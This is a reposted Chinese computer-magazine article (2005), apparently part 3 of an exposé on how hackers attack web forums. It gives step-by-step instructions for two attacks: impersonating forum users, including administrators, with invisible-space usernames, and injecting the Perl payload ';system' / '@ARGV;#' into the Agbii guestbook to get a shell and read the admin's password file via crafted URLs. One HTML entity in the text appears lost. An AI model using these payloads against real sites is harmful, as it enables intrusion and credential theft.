實(shí)例:黑客入侵論壇各種手段曝光3

sf888

實(shí)例:黑客入侵論壇各種手段曝光  \r\n \r\n個(gè)人電腦　2005-11-06  \r\n關(guān)鍵字查詢： 黑客 　  \r\n\r\n編者按： \r\n目前網(wǎng)上有種新的趨勢(shì)，黑客們的攻擊目標(biāo)開始從網(wǎng)站延伸到論壇和聊天室及留言板等公共場(chǎng)所，而許多用戶的論壇密碼竟然與E-mail和QQ的密碼完全相同，因此對(duì)大家的網(wǎng)絡(luò)安全威脅非常大…… \r\n  \r\n \r\n\r\n第三招：魚目混珠冒名發(fā)言 \r\n\r\n　　 舉個(gè)例子，黑客可以在打開記事本后按下tab鍵或CapsLock+Tab鍵，這樣就會(huì)形成一個(gè)特殊的空格。復(fù)制該空格，用他想冒名發(fā)言的用戶名加上該空格注冊(cè)一個(gè)新用戶，這樣就會(huì)成功注冊(cè)一個(gè)和對(duì)方一樣的名字，接下來就可以冒名發(fā)言了，稍不留意別人就會(huì)上當(dāng)。形成特殊空格還可以采用區(qū)位輸入法輸入aaaa或aaab或aaac。另外在html標(biāo)簽里還可以使用 （ 就是顯示空白內(nèi)容的意思）制造一個(gè)特殊的空格。用區(qū)位輸入法輸入的aaaa/aaab/aaac在ASP編寫的程序里冒名的成功率極高，而tab鍵和 制造的特殊空格在php程序里成功率更高些。更可怕的是，在wdb論壇和ibb論壇，用Tab鍵構(gòu)造的特殊用戶名可以取得和原用戶相同的權(quán)限。如果原用戶名是管理員，那黑客構(gòu)造的這個(gè)冒名用戶也會(huì)變成管理員！ \r\n第四招：暗渡陳倉形成網(wǎng)頁后門 \r\n\r\n　　 大家知道，在cgi或perl程序里如果寫入“system @ARGV;#”（注意輸入時(shí)沒有引號(hào)），就會(huì)形成一個(gè)有趣的網(wǎng)頁后門。在IE地址欄中輸入http://ip/*.pl?dir就會(huì)看到網(wǎng)站的物理目錄。以網(wǎng)上非常流行的Agbii免費(fèi)cgi留言本為例，該留言本里的留言是以第n條留言的數(shù)目、用戶名、標(biāo)題和內(nèi)容等等來排列的，而且留言都是按照順序排放在一個(gè)固定目錄data/用戶名下面的。說起來好像很復(fù)雜，讓我們來看圖7，假設(shè)這是黑客在Agbii免費(fèi)cgi留言本中的留言，它是該留言本中的第14條留言，假設(shè)其注冊(cè)的用戶名是;system，標(biāo)題為@ARGV;#，內(nèi)容則是“呵呵”，在data/222目錄下的14.pl的文件內(nèi)容就是如圖8所示。由于此留言本的用戶就是222，因此只要黑客在瀏覽器地址欄中輸入http://IP/book/data/222/14.pl?dir就會(huì)得到一個(gè)shell了（圖9）。注意這里的http://IP/book/是留言本的地址。得到shell之后，黑客還可以得到該管理員的密碼！只要在瀏覽器的地址欄中輸入“http://IP/book/data/管理員名字/14.pl?type+該留言本的物理目錄\\user\\管理員名字.cgi”就可以了。以本文為例，只要輸入“http://www.xxx.com/book/data/lxgyp/14.pl?type+d:\\虛擬主機(jī)\\web\\book\\user\\lxgyp.cgi”就可以得到該管理員的用戶名和密碼、注冊(cè)時(shí)的郵件地址、他的網(wǎng)站地址、IP地址以及登陸時(shí)間，一目了然，盡在掌握！